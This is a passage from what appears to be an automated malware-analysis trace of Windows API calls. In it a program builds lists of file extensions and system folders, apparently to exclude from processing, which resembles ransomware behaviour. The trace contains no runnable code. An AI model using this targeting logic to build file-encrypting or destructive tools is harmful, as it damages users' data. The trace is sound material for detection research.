(HeapHandle=0x2c0000, Flags=0x0, Size=0x808) returned 0x2a73d20 [0178.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1028 | out: lpWideCharStr=".ini") returned 5 [0178.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a7d958 [0178.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x808) returned 0x2a73d20 [0178.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1028 | out: lpWideCharStr=".DLL") returned 5 [0178.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a7e170 [0178.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd8) returned 0x381af0 [0178.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29e39b0 | out: hHeap=0x2c0000) returned 1 [0178.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x808) returned 0x2a73d20 [0178.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1028 | out: lpWideCharStr=".dll") returned 5 [0178.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a7e988 [0178.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x808) returned 0x2a73d20 [0178.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1028 | out: lpWideCharStr=".blf") returned 5 [0178.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a7f1a0 [0178.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x808) returned 0x2a73d20 [0178.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1028 | out: lpWideCharStr=".bat") returned 5 [0178.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a7f9b8 [0178.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x138) returned 0x2f5b18 [0178.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381af0 | out: hHeap=0x2c0000) returned 1 [0178.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x808) returned 0x2a73d20 [0178.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1028 | out: lpWideCharStr=".lnk") returned 5 [0178.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a801d0 [0178.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x818) returned 0x2a73d20 [0178.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1036 | out: lpWideCharStr=".regtrans-ms") returned 13 [0178.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a809e8 [0178.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x818) returned 0x2a73d20 [0178.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1036 | out: lpWideCharStr="C:\\SystemID\\") returned 13 [0178.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a81210 [0178.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82c) returned 0x2a81a38 [0178.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a0e780, cbMultiByte=-1, lpWideCharStr=0x2a81a38, cchWideChar=1046 | out: lpWideCharStr="C:\\Users\\Default User\\") returned 23 [0178.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2a82270 [0178.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a81a38 | out: hHeap=0x2c0000) returned 1 [0178.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c8) returned 0x2a761d0 [0178.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0178.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a81a38 [0178.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a0e780, cbMultiByte=-1, lpWideCharStr=0x2a81a38, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0178.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2a82aa8 [0178.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a81a38 | out: hHeap=0x2c0000) returned 1 [0178.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x826) returned 0x2a81a38 [0178.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a0e780, cbMultiByte=-1, lpWideCharStr=0x2a81a38, cchWideChar=1043 | out: lpWideCharStr="C:\\Users\\All Users\\") returned 20 [0178.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2a832e0 [0178.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a81a38 | out: hHeap=0x2c0000) returned 1 [0178.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x822) returned 0x2a81a38 [0178.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a0e780, cbMultiByte=-1, lpWideCharStr=0x2a81a38, cchWideChar=1041 | out: lpWideCharStr="C:\\Users\\Default\\") returned 18 [0178.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2a83b18 [0178.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a81a38 | out: hHeap=0x2c0000) returned 1 [0178.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x834) returned 0x2a84350 [0178.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a0e780, cbMultiByte=-1, lpWideCharStr=0x2a84350, cchWideChar=1050 | out: lpWideCharStr="C:\\Documents and Settings\\") returned 27 [0178.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2a84b90 [0178.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a84350 | out: hHeap=0x2c0000) returned 1 [0178.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81e) returned 0x2a81a38 [0178.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a81a38, cchWideChar=1039 | out: lpWideCharStr="C:\\ProgramData\\") returned 16 [0178.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a84350 [0178.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a81a38 | out: hHeap=0x2c0000) returned 1 [0178.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x818) returned 0x2a73d20 [0178.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1036 | out: lpWideCharStr="C:\\Recovery\\") returned 13 [0178.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a81a38 [0178.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2a0) returned 0x2a79478 [0178.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a761d0 | out: hHeap=0x2c0000) returned 1 [0178.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x83a) returned 0x2a853d8 [0178.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a0e780, cbMultiByte=-1, lpWideCharStr=0x2a853d8, cchWideChar=1053 | out: lpWideCharStr="C:\\System Volume Information\\") returned 30 [0178.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2a85c20 [0178.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a853d8 | out: hHeap=0x2c0000) returned 1 [0178.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42430 [0178.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x848) returned 0x2a86468 [0178.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a42430, cbMultiByte=-1, lpWideCharStr=0x2a86468, cchWideChar=1060 | out: lpWideCharStr="C:\\Users\\%username%\\AppData\\Roaming\\") returned 37 [0178.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2a86cb8 [0178.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a86468 | out: hHeap=0x2c0000) returned 1 [0178.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42430 | out: hHeap=0x2c0000) returned 1 [0178.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42430 [0178.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x844) returned 0x2a86468 [0178.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a42430, cbMultiByte=-1, lpWideCharStr=0x2a86468, cchWideChar=1058 | out: lpWideCharStr="C:\\Users\\%username%\\AppData\\Local\\") returned 35 [0178.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2a87510 [0178.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a86468 | out: hHeap=0x2c0000) returned 1 [0178.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42430 | out: hHeap=0x2c0000) returned 1 [0178.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x816) returned 0x2a73d20 [0178.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1035 | out: lpWideCharStr="C:\\Windows\\") returned 12 [0178.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a853d8 [0178.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x818) returned 0x2a73d20 [0178.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1036 | out: lpWideCharStr="C:\\PerfLogs\\") returned 13 [0178.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a86468 [0178.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x832) returned 0x2a87d68 [0178.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a0e780, cbMultiByte=-1, lpWideCharStr=0x2a87d68, cchWideChar=1049 | out: lpWideCharStr="C:\\ProgramData\\Microsoft\\") returned 26 [0178.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2a885a8 [0178.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a87d68 | out: hHeap=0x2c0000) returned 1 [0178.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x83a) returned 0x2a88df0 [0178.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a0e780, cbMultiByte=-1, lpWideCharStr=0x2a88df0, cchWideChar=1053 | out: lpWideCharStr="C:\\ProgramData\\Package Cache\\") returned 30 [0178.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2a89638 [0178.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a88df0 | out: hHeap=0x2c0000) returned 1 [0178.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a87d68 [0178.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a0e780, cbMultiByte=-1, lpWideCharStr=0x2a87d68, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0178.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2a88df0 [0178.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a87d68 | out: hHeap=0x2c0000) returned 1 [0178.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a87d68 [0178.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a0e780, cbMultiByte=-1, lpWideCharStr=0x2a87d68, cchWideChar=1040 | out: 